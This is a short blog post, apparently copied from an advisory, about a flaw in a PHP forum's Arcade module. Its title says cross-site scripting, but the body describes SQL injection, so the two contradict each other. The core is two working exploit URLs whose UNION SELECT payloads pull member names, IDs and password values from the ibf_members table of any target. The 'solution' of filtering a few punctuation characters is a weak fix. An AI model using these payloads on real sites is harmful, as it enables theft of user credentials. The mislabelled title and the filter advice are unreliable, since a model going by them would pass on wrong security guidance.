Validation Hole Permits Cross-Site Scripting Attacks

A remote user can inject SQL commands. A remote user can supply a specially crafted input value to execute SQL commands on the underlying database.











A demonstration exploit URL (I) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

A demonstration exploit URL (II) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

SOLUTION
Just make filter for the character below for user input :
'"!@#$%^^&&*()=+

Source: somewhere in the internet

Sincerelly,

Eko Wahyudiharto
PS: If you've benefit from this blog,
you can support it by making a small contribution.

Enter your email address:

Delivered by FeedBurner

Post a Comment Bookmark and Share

 

Post a Comment

Leave comments here...